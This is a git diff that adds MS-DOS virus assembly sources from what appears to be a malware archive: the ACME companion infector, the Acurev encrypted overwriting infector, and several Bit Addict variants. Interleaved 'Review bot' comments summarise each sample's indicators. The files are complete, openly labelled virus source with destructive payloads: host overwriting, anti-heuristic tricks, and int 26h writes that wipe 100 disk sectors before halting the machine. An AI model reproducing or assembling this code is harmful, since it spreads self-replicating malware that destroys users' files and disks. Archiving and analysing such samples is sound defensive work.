+; necessary.
+;
+; ACME currently eludes all scanners and as a companion virus, openly
+; defies every integrity checker I have in my inventory with the EXCEPTION
+; of Stiller Research's. This issue includes a quality report on
+; Solomon's Toolkit, so it's only fair to state that while the documentation
+; for this product seems to indicate that the developers know what a
+; companion infection is, the software does nothing to protect against
+; it in default mode. ACME flies through the Toolkit, for now. Go figure.
+;
+; ACME will also play a generic ACME-style virus tune late in the
+; afternoon. Those who fancy a musical virus but have never heard one are
+; encouraged to play with ACME. Set your system clock to anytime after
+; 4:00 pm. The musical payload takes up most of the space in this virus,
+; removing it shaves the virus to 242 bytes - nice and small if you like.
+;
+; The virus purist may recognize the root of ACME as a piece of code known
+; as ZENO - a small, single-step companion infector. ZENO's author is
+; thanked, wherever he/she is.
+
+
+START:
+
+ jmp VIR_BEGIN ; get going
+
+
+WILDCARD DB "*.EXE",0
+FILE_EXT DB "COM",0
+FILE_FOUND DB 12 DUP(' '), 0
+FILE_CREATE DB 12 DUP(' '), 0
+SEARCH_ATTRIB DW 17H
+NUM_INFECT DW 0
+MUZIK DW 4304,0006, 4063,0006, 4304,0006, 4063,0006, ;MUZIK - notes/delay
+ DW 3043,0006, 4831,0006, 4063,0006, 3043,0006, ;in format xxxx,yyyy
+ DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
+ DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
+ DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
+ DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
+ DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
+ DW 3043,0006, 5119,0006, 5423,0006, 3043,0006,
+ DW 6087,0020,
+
+ DW 6087,0006,
+ DW 7239,0006, 3619,0006, 4831,0006, 6087,0006
+ DW 7670,0006, 7239,0006, 4831,0006, 3619,0006
+
+ DW 6087,0006, 4063,0006, 3043,0006, 5119,0006
+ DW 4831,0006, 6087,0006, 7239,0006, 8126,0006
+ DW 6087,0020,
+
+ DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
+ DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
+ DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
+ DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
+ DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
+ DW 3043,0006, 5119,0006, 5423,0006, 3043,0006,
+ DW 6087,0020,
+
+ DW 6087,0006,
+ DW 7239,0006, 3619,0006, 4831,0006, 6087,0006
+ DW 7670,0006, 7239,0006, 4831,0006, 3619,0006
+
+ DW 6087,0006, 4063,0006, 3043,0006, 5119,0006
+ DW 4831,0006, 6087,0006, 7239,0006, 8126,0006
+ DW 6087,0020,
+
+ DW 7670,0006, 7239,0006, 4831,0006, 3619,0006
+ DW 3043,0006, 3619,0006, 4831,0006, 6087,0006
+ DW 3043,0010,
+
+ DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
+ DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
+ DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
+ DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
+ DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
+ DW 3043,0006, 5119,0006, 5423,0006, 3043,0006,
+ DW 6087,0020,
+
+ DW 7670,0006, 7239,0006, 4831,0006, 3619,0006
+ DW 3043,0006, 3619,0006, 4831,0006, 6087,0006
+ DW 3043,0010,
+
+ DW 6087,0006,
+ DW 7239,0006, 3619,0006,
4831,0006, 6087,0006
+ DW 7670,0006, 7239,0006, 4831,0006, 3619,0006
+
+ DW 6087,0006, 4063,0006, 3043,0006, 5119,0006
+ DW 4831,0006, 6087,0006, 7239,0006, 8126,0006
+ DW 6087,0020,
+
+ DW 0ffffh
+
+
+
+My_Cmd:
+CMD_LEN DB 13
+FILE_CLONE DB 12 DUP (' '), 0
+
+;------------------------------------------------------------------;
+Prepare_command:
+ cld
+ mov di,OFFSET FILE_CLONE
+ mov al,0
+ mov cx,12
+ repne scasb ; find the end of string \0
+
+ mov al,0Dh ;
+ stosb ; replace \0 with a
+
+ mov ax,12 ;store length of the command
+ sub ax,cx
+ mov CMD_LEN, al
+ ret
+
+;------------------------------------------------------------------;
+Store_name:
+
+ mov di,OFFSET FILE_FOUND ;Point to buffer.
+ mov si,158 ;stow the file found in buffer
+ mov cx,12
+ rep movsb
+
+ mov di,OFFSET FILE_CREATE ;Point to buffer.
+ mov si,158
+ mov cx,12
+ rep movsb
+
+ cld
+ mov di,OFFSET FILE_CREATE
+ mov al,'.'
+ mov cx,9
+ repne scasb ;find the '.'
+
+ mov si,OFFSET FILE_EXT
+ mov cx,3
+ rep movsb ;replace the .EXE with .COM
+ ;from buffer
+ ret
+
+
+;------------------------------------------------------------------;
+ ;Does the file exist?
+
+Check_file:
+ mov dx,OFFSET FILE_CREATE
+ mov cx,0
+ mov ax,3d00h ; Open file, read only
+ int 21h
+
+Chk_done:
+ ret
+
+;------------------------------------------------------------------;
+Infect_file: ;create companion routine
+
+ mov dx,OFFSET FILE_CREATE ;contains name of "companion"
+ mov cx,0
+ mov ah,3ch ;construct file
+ int 21h
+ jc EXIT
+
+ ;Write virus to companion file
+ mov bx,ax
+ mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length
+ mov dx,OFFSET START
+ mov ah,40h ;write to file function
+ int 21h ;do it
+
+ ;Close file
+ mov ah,3eh ; ASSUMES bx still has file handle
+ int 21h
+
+ ;Change attributes
+ mov dx,OFFSET FILE_CREATE ;of created file to
+ mov cx,3 ;(1) read only and (2) hidden
+ mov ax,4301h
+ int 21h
+
+ ret
+
+;------------------------------------------------------------------
+; Read all the directory filenames and store as records in buffer.
+;------------------------------------------------------------------
+
+Vir_begin:
+ mov ah,02Ch ;DOS get time function
+ int 021h
+ mov al,ch ;Copy hour into AL
+ cbw ;Sign-extend AL into AX
+ cmp ax,0010h ;Did the function return 16 (4 pm)?
+ jge TOON ;If greater than or equal, muzik!
+
+
+ mov sp,offset STACK_HERE ;move stack down
+ mov bx,sp
+ add bx,15
+ mov cl,4
+ shr bx,cl
+ mov ah,4ah ;deallocate rest of memory
+ int 21h
+
+ mov di,OFFSET FILE_CLONE ;Point to buffer.
+ mov si,OFFSET FILE_FOUND
+ mov cx,12
+ rep movsb
+
+Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search
+ mov cx,SEARCH_ATTRIB
+
+ mov ah,4Eh ;find the first matching file
+ int 21h
+
+ jc EXIT ;If empty directory, exit
+
+Do_file:
+ call STORE_NAME
+ call CHECK_FILE
+ call INFECT_FILE
+
+
+
+Find_next:
+ mov ah,4fh ; find next file and keep finding until
+ int 21h ; all
+ jnz Do_File ; infected
+
+Exit:
+
+ ; Run the original program
+ call Prepare_command
+ mov si, OFFSET MY_CMD
+ int 2Eh ; Pass command to command
+ ; interpreter for execution
+
+ mov ax,4C00H ; Exit to DOS
+ int 21h
+
+;-------------------------------------------------------------------
+;This routine enables ACME virus to compel the pc to play the
+;ACME virus song just about the time the clock-watchers are getting
+;ready to leave
+;-------------------------------------------------------------------
+TOON:
+ cli ;interrupts off
+ mov al,10110110xb ;the number
+ out 43h,al ;to send to the speaker
+ lea si,MUZIK ;point (si) to the ACME note table
+
+TOON2: cld
+ lodsw ;load word into ax and increment (si)
+ cmp ax,0ffffh ;is it ffff? If so, end of table
+ jz GO_MUZIK2 ;so, time to jump into endless loop
+ out 42h,al
+ mov al,ah
+ out 42h,al ;send it next
+ in al,61h ;get value to turn on speaker
+ or al,00000011xb ;OR the gotten value
+ out 61h,al ;now we turn on speaker
+ lodsw ;load the repeat loop count into (ax)
+LOOP6:
+ mov cx,8000 ;delay count
+LOOP7:
+ loop LOOP7 ;do the delay
+ dec ax ;decrement repeat count
+ jnz LOOP6 ;if not = 0 loop back
+ in al,61h ;all done
+ and al,11111100xb ;number turns speaker off
+ out 61h,al ;send it
+ jmp short TOON2 ;now go do next note
+GO_MUZIK2: ;our loop point
+
+ sti ;enable interrupts
+ jmp TOON ;jump back to beginning - this code
+ ; has the additional advantage of
+;locking out CTRL-ALT-DEL reboot.
+;The user must do a hard reset to recover from ACME.
+
+
+
+END_OF_CODE = $
+
+STACK_HERE EQU END_OF_CODE + 512
+
+
+;
+; > and Remember Don't Forget to Call <
+; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <
+;
diff --git a/MSDOS/Virus.MSDOS.Unknown.acurev.asm b/MSDOS/Virus.MSDOS.Unknown.acurev.asm
new file mode 100644
index 00000000..077f098b
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.acurev.asm
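Review bot: The long header paragraph discusses assemblers and scanner results but never states the on-disk artefacts a responder would look for, which is the one thing an archived sample's header should carry. From the code: for each `*.EXE` found with `SEARCH_ATTRIB` (17H) in the current directory, `Infect_file` creates a same-base-name `.COM` (`Store_name` swaps the extension via `FILE_EXT`), writes `END_OF_CODE - START` bytes into it, and sets attribute 3, read-only plus hidden (`mov cx,3` / `mov ax,4301h`); the original program is then launched through `int 2Eh` with the name from `MY_CMD`. When the hour is 16 or later (`cmp ax,0010h` / `jge TOON`) the code runs with interrupts disabled until `GO_MUZIK2` re-enables them and jumps back, and the trailing comment says only a hard reset recovers. A header comment like `; Indicators: hidden+read-only .COM next to every .EXE, size END_OF_CODE-START; host run via int 2Eh; after 16:00 the machine hangs in TOON until hard reset` would let a reader triage the file without reading the note table.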
@@ -0,0 +1,165 @@
+; ------------------------------------------------------------------------- ;
+; Acurev v1.8 coded by KilJaeden of the Codebreakers 1998 ;
+; ------------------------------------------------------------------------- ;
+; Description: ;
+; ;
+; v1.0 - start with a simple *.com overwritter ;
+; v1.1 - add XOR encryption ohhh yeah :) ;
+; v1.2 - add restoring time/date stamps ;
+; v1.3 - now we can infect even read only files! hah! ;
+; v1.4 - why infect only one directory when you can do many? hehe ;
+; v1.5 - add Anti-Heuristic tricks yehaw! ;
+; v1.6 - display a message on girlfriends bday ;
+; v1.7 - display a different message every saturday ;
+; v1.8 - make it 666 bytes big hehe ;
+; ------------------------------------------------------------------------- ;
+; to compile ::] tasm acurev.asm ;
+; to link :::::] tlink /t acurev.obj ;
+; ------------------------------------------------------------------------- ;
+
+code segment ; name our segment "code"
+ assume cs:code,ds:code ; assign CS and DS to code
+ org 100h ; this is a .com file now
+
+start:
+ mov cx,0FFFFh ; mmmmmmmm anti-heuristics
+
+anti_one:
+ jmp anti_two ; jump to anti_two
+ mov ax,4c00h ; terminate program
+ call do_int21 ; terminate this shit
+
+anti_two:
+ loop anti_one ; loop anti_one heh
+
+;xor_start:
+ lea si,encrypted ; SI points to encrypted area start
+ mov di,si ; mov SI to DI
+ mov cx,finished-encrypted ; # of bytes in encrypted area
+ call encryption ; call the encryption routine
+ jmp encrypted ; jump to start of encrypted area
+
+encryption:
+ lodsb ; load a byte
+ xor al,byte ptr [decrypt] ; xor the byte with our key
+ stosb ; return the byte
+ loop encryption ; loop until done
+ ret ; return from call
+
+ decrypt db 0 ; decryption key value 0
+
+encrypted:
+ mov ah,4eh ; find the first file
+
+get:
+ xor cx,cx ; cx to 0
+ lea dx,comfile ; load *.com string
+ call do_int21 ; and get the first .com
+ jc new_dir ; no more .com?
new dir
+
+ mov dx,9eh ; get the file name info
+ mov ax,4301h ; set file attributes
+ xor cx,cx ; to absolutely none
+ call do_int21 ; can infect read only files now!
+
+ mov ax,3d02h ; open the file read / write
+ mov dx,9eh ; get the file name info
+ call do_int21 ; open it / get file info now
+ xchg bx,ax ; move the file info to BX
+
+ mov ax,5700h ; get time / date stamps
+ call do_int21 ; get them now
+ mov time,dx ; save the value here
+ mov date,cx ; and save the value here
+
+ in al,40h ; get a random value from clock
+ mov byte ptr [decrypt],al ; save the value as our key
+ lea si,encrypted ; load the start of encrypted area
+ lea di,finished ; load the end of encrypted area
+ mov cx,finished-encrypted ; total # of bytes between them
+ call encryption ; and encrypt them now
+
+ mov ah,40h ; write to file
+ mov cx,encrypted-start ; total # of bytes to write
+ lea dx,start ; and start writting from here
+ call do_int21 ; write diz shitz man!
+
+ mov ah,40h ; write to file
+ mov cx,finished-encrypted ; total # of bytes to write
+ lea dx,finished ; and write from here
+ call do_int21 ; write it man!
+
+ mov ax,5701h ; restore time/date
+ mov dx,time ; from this value
+ mov cx,date ; and this value
+ call do_int21 ; restore it now
+
+ mov ah,3eh ; close the file
+ call do_int21 ; do it man!
+
+ mov ah,4fh ; find the next file
+ jmp get ; and jump back to get
+
+new_dir:
+ lea dx,dot_dot ; load .. into dx
+ mov ah,3bh ; change directories routine
+ call do_int21 ; change the directory
+ jnc encrypted ; and lets go again baby
+
+;payload1:
+ mov ah,2ah ; get the system time
+ call do_int21 ; get the time now
+ cmp dh,07 ; is it July?
+ jne saturday ; is it saturday tho?
+ cmp dl,16 ; is it the 16th?
+ jne saturday ; nope, skip payload :(
+
+;payload:
+ mov ah,09h ; print a message
+ lea dx,bdaymsg ; load the message
+ call do_int21 ; print the message
+
+saturday:
+ mov ah,2ah ; get the system time
+ call do_int21 ; get the time now
+ cmp al,006h ; is it saturday?
+ jne end_virus ; naw, end the virus
+
+;satpload:
+ mov ah,09h ; print another message
+ lea dx,satdmsg ; the saturday message
+ call do_int21 ; print this shit!
+
+end_virus:
+ int 20h ; end the virus
+
+do_int21:
+ int 21h ; do the int 21h
+ ret ; return from call
+
+;data_area:
+
+ satdmsg db '',10,13
+ db 'Acurev v1.8 coded by KilJaeden of the Codebreakers on 05/29/98',10,13
+ db '',10,13
+ db ' --> How Can You Think Freely In The Shadow Of A Church? <--',10,13
+ db ' --> You Cannot Sedate, All The Things You Hate <--',10,13
+ db '',10,13
+ db ' --> Your Infected <--',10,13,'$'
+
+ bdaymsg db '',10,13
+ db ' Happy Birthday Christine Moore *kiss* I''ll be home',10,13
+ db ' In less then a month now... June29th, Can''t wait!!',10,13,'$'
+
+ time dw 0h ; some space for the time
+ date dw 0h ; some space for the date
+ dot_dot db "..",0 ; changeing directories
+ comfile db "*.com",0 ; load up *.com hehe
+ db 100 dup (90h) ; make it 666 bytes
+ finished label near ; just a label man
+ code ends ; end code segment
+ end start ; end / where to start
+
+; ------------------------------------------------------------------------- ;
+; ---------> How Can You Think Freely In The Shadow Of A Church? <--------- ;
+; ------------------------------------------------------------------------- ;
diff --git a/MSDOS/Virus.MSDOS.Unknown.addict1.asm b/MSDOS/Virus.MSDOS.Unknown.addict1.asm
new file mode 100644
index 00000000..869f9c30
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.addict1.asm
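Review bot: The version list in the header describes features from the author's side but never states the consequence that matters for response: the host is not preserved. The file is opened with `mov ax,3d02h` and, with no seek, `encrypted-start` bytes from `start` and then `finished-encrypted` bytes from `finished` are written at offset 0, so an infected `.COM` has its first 666 bytes (per the v1.8 line and the `db 100 dup (90h)` padding) replaced and can only be restored from backup, not disinfected. Two further observable traits are worth a header line: the file's attributes are cleared to zero (`mov ax,4301h` / `xor cx,cx`) and never set back, while the time/date stamp is saved (5700h) and restored (5701h), and the search walks upward via `dot_dot` until `ch dir ..` fails (`jnc encrypted`). A comment such as `; Effect: overwriting infector - first 666 bytes of each *.com in cwd and every parent dir replaced; attributes reset to 0, timestamp preserved` at the top would give a reader that picture at a glance.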
@@ -0,0 +1,191 @@
+code segment
+ org 0
+
+ call Virus
+
+SavedCode db 0cdh,020h,11 dup(090h)
+
+Jump db 0e9h
+NearOfset dw 0
+
+ID db 'BIT ADDICT'
+ExeHead db 'MZ'
+
+SaveInt21 equ this word
+OldInt21 dd 0
+Teller db 0
+Message db 'The Bit Addict says: ',13,10
+ db '"You have a good taste for hard disks, it was delicious !!!"'
+ db 13,10,'$'
+
+NewInt21:
+ cmp ah,4bh
+ je Exec
+ jmp cs:OldInt21
+Exec: cmp cs:Teller,100
+ jb Infect
+
+ mov ax,2
+ xor bx,bx
+ mov cx,100
+ xor dx,dx
+ int 026h
+ mov ax,3
+ xor bx,bx
+ mov cx,100
+ xor dx,dx
+ int 026h
+
+ mov ax,cs
+ mov ds,ax
+ mov ah,9
+ lea dx,Message
+ int 021h
+
+HangUp: cli
+ jmp HangUp
+
+Infect: push ax
+ push bx
+ push cx
+ push dx
+ push si
+ push di
+ push ds
+ push es
+ push dx
+ mov ax,04300h
+ int 021h
+ push cx
+ mov ax,04301h
+ xor cx,cx
+ int 021h
+ mov ax,03d02h
+ int 021h
+ jnc OK1
+ jmp Error
+Ok1: mov bx,ax
+ mov ax,05700h
+ int 021h
+ push cx
+ push dx
+ mov ax,cs
+ mov ds,ax
+ mov es,ax
+ mov ax,03f00h
+ mov cx,13
+ lea dx,SavedCode
+ int 021h
+ jc Close
+ lea si,ID
+ lea di,SavedCode[3]
+ mov cx,10
+ repe cmpsb
+ je Close
+ lea si,ExeHead
+ lea di,SavedCode
+ mov cx,2
+ repe cmpsb
+ je Close
+Com: mov ax,04202h
+ xor cx,cx
+ xor dx,dx
+ int 021h
+ jc Close
+ or dx,dx
+ jne Close
+ sub ax,3
+ jb Close
+ mov NearOfset,ax
+ mov ax,04000h
+ mov cx,CodeSize
+ xor dx,dx
+ int 021h
+ jc Close
+ mov ax,04200h
+ xor cx,cx
+ xor dx,dx
+ int 021h
+ jc Close
+ mov ax,04000h
+ mov cx,13
+ lea dx,Jump
+ int 021h
+ inc cs:Teller
+Close: pop dx
+ pop cx
+ mov ax,05701h
+ int 021h
+ mov ax,03e00h
+ int 021h
+Error: pop cx
+ pop dx
+ pop es
+ pop ds
+ push ds
+ push es
+ mov ax,04301h
+ int 021h
+ pop es
+ pop ds
+ pop di
+ pop si
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ jmp cs:OldInt21
+
+Virus: pop bx
+ sub bx,3
+ xor ax,ax
+ mov ds,ax
+ cmp w[021h*4+2],0a000h
+ jae Exit
+ mov dx,03bfh
+ mov al,3
+ out dx,al
+ mov ax,cs
+ mov ds,ax
+ mov ax,VirusSegment1
+Repeat: mov es,ax
+ mov si,bx
+ xor di,di
+ mov
cx,CodeSize
+ repe movsb
+ mov si,bx
+ xor di,di
+ mov cx,CodeSize
+ repe cmpsb
+ je Ok2
+ mov ax,VirusSegment2
+ mov dx,es
+ cmp ax,dx
+ je Exit
+ jmp Repeat
+Ok2: xor ax,ax
+ mov ds,ax
+ mov ax,ds:[84h]
+ mov es:SaveInt21[0],ax
+ mov ax,ds:[86h]
+ mov es:SaveInt21[2],ax
+ mov ax,NewInt21
+ mov [84h],ax
+ mov ax,es
+ mov [86h],ax
+Exit: mov ax,cs
+ mov ds,ax
+ mov es,ax
+ mov si,bx
+ add si,3
+ mov di,0100h
+ mov cx,13
+ rep movsb
+ mov ax,0100h
+ push ax
+ ret
+
+CodeSize equ $
+VirusSegment1 equ 0c000h-(($+0fh) shr 4)
+VirusSegment2 equ 0bc00h-(($+0fh) shr 4)
+ 
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.addict2.asm b/MSDOS/Virus.MSDOS.Unknown.addict2.asm
new file mode 100644
index 00000000..2d72df43
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.addict2.asm
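Review bot: This file carries no header comment at all, and its destructive trigger is buried in the middle of the interrupt handler where a reader skimming for the infection routine will miss it. Once `Teller` reaches 100 (`Exec: cmp cs:Teller,100` / `jb Infect`), the `int 026h` absolute-write calls at `Exec` target drives 2 and 3 (C: and D:) for 100 sectors starting at sector 0 with DS:BX left as `xor bx,bx`, after which `Message` is printed and the machine is halted in `HangUp` (`cli` / `jmp HangUp`). The other facts a triage reader wants are also only visible by tracing: infected `.COM` files start with a near `jmp` followed by `'BIT ADDICT'` at offset 3 (the `lea di,SavedCode[3]` comparison), the resident copy lives at a fixed segment (`VirusSegment1` / `VirusSegment2`), and the int 21h vector is replaced by direct stores to 0:84h/0:86h rather than through DOS. A header comment such as `; Bit Addict: .COM prepender, marker 'BIT ADDICT' at offset 3; int 21h vector written directly at 0:84h; after 100 infections int 26h overwrites 100 sectors from sector 0 on drives C: and D: and halts` would make the sample's risk clear on first read.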
@@ -0,0 +1,251 @@
+jmpc macro Dest
+ local Skip
+
+ jnc Skip
+ jmp Dest
+Skip:
+ endm
+
+jmpnc macro Dest
+ local Skip
+
+ jc Skip
+ jmp Dest
+Skip:
+ endm
+
+jmpe macro Dest
+ local Skip
+
+ jnz Skip
+ jmp Dest
+Skip:
+ endm
+
+jmpne macro Dest
+ local Skip
+
+ jz Skip
+ jmp Dest
+Skip:
+ endm
+
+code segment
+ assume cs:code,ds:code,es:code
+ org 0
+
+ID db 'BIT ADDICT'
+ID_Length equ $-offset ID
+
+SavedCode equ this byte
+OldIP dw 0
+OldCS dw 0
+OldSP dw 0
+OldSS dw 0
+ dw 0
+
+Begin: mov ax,4c00h
+ int 21h
+
+ComHeader:
+ mov ax,cs
+ add ax,0100h
+OldPrgSize equ this word-2
+ push ax
+ xor ax,ax
+ push ax
+ retf
+
+Infect: push ax
+ push bx
+ push cx
+ push cx
+ push si
+ push di
+ push bp
+ push ds
+ push es
+ mov ax,3d02h
+ int 21h
+ jmpc Close
+ push cs
+ pop ds
+ push cs
+ pop es
+ mov bx,ax
+ mov ah,3fh
+ mov cx,HeaderLength
+ lea dx,Header
+ int 21h
+ jmpc Close
+ cmp ax,HeaderLength
+ jne ComFile
+ cmp Signature,5a4dh
+ je ComChk
+ExeChk: mov ax,ExeCS
+ add ax,HeaderSize
+ mov dx,10h
+ mul dx
+ mov cx,dx
+ mov dx,ax
+ jmp Check
+ComChk: xor cx,cx
+ mov dx,NearJump
+ sub dx,offset Begin-3
+ jb ComFile
+Check: mov ax,4200h
+ int 21h
+ mov ah,3fh
+ mov cx,ID_Length
+ lea dx,ID_Check
+ int 21h
+ lea si,ID_Check
+ lea di,ID
+ mov cx,ID_Length
+ repe cmpsb
+ jmpe Close
+ cmp Signature,5a4dh
+ je ExeFile
+ComFile:mov si,offset Header
+ mov di,offset SavedCode
+ mov cx,0ah
+ rep movsb
+ mov ax,4202h
+ xor cx,cx
+ xor dx,dx
+ int 21h
+ mov cx,10h
+ div cx
+ or dx,dx
+ je Ok1
+ push ax
+ mov ah,40h
+ mov cx,10h
+ sub cx,dx
+ xor dx,dx
+ int 21h
+ pop ax
+ jc Close
+ inc ax
+Ok1: add ax,10h
+ mov OldPrgSize,ax
+ mov ah,40h
+ mov cx,CodeSize1
+ xor dx,dx
+ int 21h
+ jmpc Close
+ mov ax,4200h
+ xor cx,cx
+ xor dx,dx
+ int 21h
+ jmpc Close
+ mov ah,40h
+ mov cx,10
+ mov dx,offset ComHeader
+ int 21h
+ jmp Close
+ExeFile:mov ax,ExeIP
+ mov OldIP,ax
+ mov ax,ExeCS
+ mov OldCS,ax
+ mov ax,ExeSP
+ mov OldSP,ax
+ mov ax,ExeSS
+ mov OldSS,ax
+ mov ax,PageCount
+ dec ax
+ 
mov cx,200h
+ mul cx
+ add ax,PartPage
+ adc dx,0
+ mov cx,dx
+ mov dx,ax
+ mov ax,4200h
+ int 21h
+ mov cx,10h
+ div cx
+ or dx,dx
+ je Ok2
+ push ax
+ mov ah,40h
+ mov cx,10h
+ sub cx,dx
+ xor dx,dx
+ int 21h
+ pop ax
+ jc Close
+ inc ax
+Ok2: sub ax,HeaderSize
+ mov ExeCS,ax
+ mov ExeIP,offset Begin
+ add ax,CodeSizePara2
+ mov ExeSS,ax
+ mov ExeSP,200h
+ mov ax,MinMem
+ cmp ax,20h+CodeSizePara2-CodeSizePara1
+ jae Ok3
+ mov ax,20h
+Ok3: mov MinMem,ax
+ mov ax,PartPage
+ add ax,offset CodeSize2
+ xor dx,dx
+ mov cx,200h
+ div cx
+ add PageCount,ax
+ mov PartPage,dx
+ mov ah,40h
+ mov cx,offset CodeSize1
+ xor dx,dx
+ int 21h
+ jc Close
+ mov ax,4200h
+ xor cx,cx
+ xor dx,dx
+ int 21h
+ jc Close
+ mov ah,40h
+ mov cx,HeaderLength
+ mov dx,offset Header
+ int 21h
+Close: mov ah,3eh
+ int 21h
+ pop es
+ pop ds
+ pop di
+ pop si
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ iret
+
+CodeSize1 equ $
+CodeSizePara1 equ ($+0fh) / 4
+
+Header dw 14h dup(?)
+NearJump equ Header[1h] ; Com file
+
+Signature equ Header[0h] ; Exe file
+PartPage equ Header[2h]
+PageCount equ Header[4h]
+ReloCount equ Header[6h]
+HeaderSize equ Header[8h]
+MinMem equ Header[0ah]
+MaxMem equ Header[0ch]
+ExeSS equ Header[0eh]
+ExeSP equ Header[10h]
+ChkSum equ Header[12h]
+ExeIP equ Header[14h]
+ExeCS equ Header[16h]
+TablOfs equ Header[18h]
+OverlayNr equ Header[1ah]
+HeaderLength equ 1ch
+
+ID_Check db ID_Length dup(?)
+
+CodeSize2 equ $
+CodeSizePara2 equ ($+0fh) shr 4
+
+code ends
+
+end
diff --git a/MSDOS/Virus.MSDOS.Unknown.addict3.asm b/MSDOS/Virus.MSDOS.Unknown.addict3.asm
new file mode 100644
index 00000000..ea48d3f6
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.addict3.asm
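Review bot: Nothing in this file says that it appears to be an unfinished fragment rather than a working variant, and a reader comparing it with the sibling addict1/addict3 files will otherwise spend time looking for an install path that does not exist. `Begin` is the entry the EXE path points at (`mov ExeIP,offset Begin`) and it terminates immediately (`mov ax,4c00h` / `int 21h`); no code in the hunk stores an int 21h vector or issues a set-vector call, and the `Infect` routine, which ends with `iret` as if it were an interrupt handler, is never referenced by any jump or call in the file. The `end` directive also names no start label, so even as a standalone build there is no defined entry point. A one-line header such as `; Bit Addict variant - incomplete: no resident installer, Infect is unreachable, Begin only terminates` would record that the file is a fragment kept for the 'BIT ADDICT' marker and header-handling code, not a functional sample.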
@@ -0,0 +1,265 @@ +code segment + assume cs:code,ds:code,es:code + + org 0 + +Size2 equ Virus-Relocate + + mov cx,Size2 + mov ax,word ptr ds:[101h] + call Virus + +Relocate: + cmp byte ptr ds:[103h],100 + jb InstallVirus + + xor dx,dx +Repeat: push dx + mov ax,2 + xor bx,bx + mov cx,100 + int 26h + pop ax + pop dx + add dx,100 + jnc Repeat + + cli +Hangup: jmp Hangup + +InstallVirus: + mov ax,04b41h + int 21h + mov ds,ax + pop ax + sub ax,offset Relocate + xor si,si + mov di,ax + mov cx,offset Size1 + cld + repe cmpsb + je Exit + push ax + mov ah,52h + int 21h + push bx + mov ah,30h + int 21h + pop di + pop bx + cmp al,2 + jb Exit + cmp al,3 + adc di,12h + call GetBuffer + mov cs:DataBuffer[bx],ax + call GetBuffer + mov es,ax + push cs + pop ds + mov si,bx + xor di,di + mov cx,offset Size1 + cld + rep movsb + xor ax,ax + mov ds,ax + mov ax,ds:[84h] + mov es:word ptr OldInt21[0],ax + mov ax,ds:[86h] + mov es:word ptr OldInt21[2],ax + mov word ptr ds:[84h],offset NewInt21 + mov word ptr ds:[86h],es + push cs + pop ds + push bx + mov ax,4b40h + lea dx,Command[bx] + int 21h + pop bx +Exit: push cs + pop es + push cs + pop ds + lea si,SavedCode[bx] + mov di,0100h + push di + mov cx,14 + rep movsb + ret + +GetBuffer: + push di + lds si,es:[di] + movsw + movsw + add si,0bh + mov cl,4 + shr si,cl + mov ax,ds + add ax,si + pop di + ret + +Jump db 0e9h +NearOffset dw 0 + db 0 +ID db 'Bit Addict' +Command db '\COMMAND.COM',0 + +SavedCode db 0cdh,020h,12 dup (0h) +Check equ SavedCode[4] +Count equ SavedCode[3] + +OldInt21 dd 0 +DataBuffer dw 0 + +NewInt21: + cmp ax,04b41h + jne Ok1 + mov ax,cs + iret +Ok1: cmp ah,4bh + je Infect +EOI: jmp dword ptr cs:OldInt21 + +WriteHeader: + push dx + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h + pop dx + jc Return + mov ah,40h + mov cx,14 + int 21h +Return: ret + +Infect: push ax + push bx + push cx + push si + push di + push es + push ds + push dx + mov ax,04300h + int 21h + push cx + test cx,1 + jz Ok2 + mov ax,04301h + and cx,0fffeh 
+ int 21h +Ok2: mov ax,03d02h + int 21h + jnc OpenOk + jmp Error +OpenOk: mov bx,ax + mov ax,05700h + int 21h + push cx + push dx + push cs + pop ds + mov es,DataBuffer + xor si,si + xor di,di + mov cx,offset Size1 + cld + rep movsb + push es + pop ds + mov ah,3fh + mov cx,14 + mov dx,offset SavedCode + int 21h + jc Close2 + cmp ax,14 + jne Close2 + mov si,offset Check + mov di,offset ID + mov cx,10 + cld +Comp: lodsb + xor al,SavedCode[1] + scasb + loope Comp + je Counter + cmp word ptr SavedCode,5a4dh + je Close2 + mov ax,04202h + xor cx,cx + xor dx,dx + int 21h + jc Close2 + or dx,dx + jne Close2 + cmp ax,0fe80h + jae Close2 + sub ax,3 + mov NearOffset,ax + push ax + mov si,offset Relocate + mov cx,Size2 +Rep1: xor [si],al + inc si + loop Rep1 + mov ah,40h + mov cx,offset Size1 + xor dx,dx + int 21h + pop ax + jc Close2 + mov si,offset Jump + mov cx,4 +Rep2: xor [si],al + inc si + loop Rep2 + mov dx,offset Jump + call WriteHeader +Close2: jmp short Close +Counter:inc Count + mov dx,offset SavedCode + call WriteHeader + jc Close +Close: pop dx + pop cx + mov ax,05701h + int 21h + mov ax,03e00h + int 21h +Error: pop cx + pop dx + pop ds + test cx,1 + jz Ok3 + mov ax,04301h + int 21h +Ok3: pop es + pop di + pop si + pop cx + pop bx + pop ax + cmp al,40h + je IntRet + jmp EOI + +IntRet: iret + +Virus: pop si + push si + push si +Rep4: xor [si],al + inc si + loop Rep4 + ret + +Size1 equ $ + +code ends + +end + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.addict4.asm b/MSDOS/Virus.MSDOS.Unknown.addict4.asm new file mode 100644 index 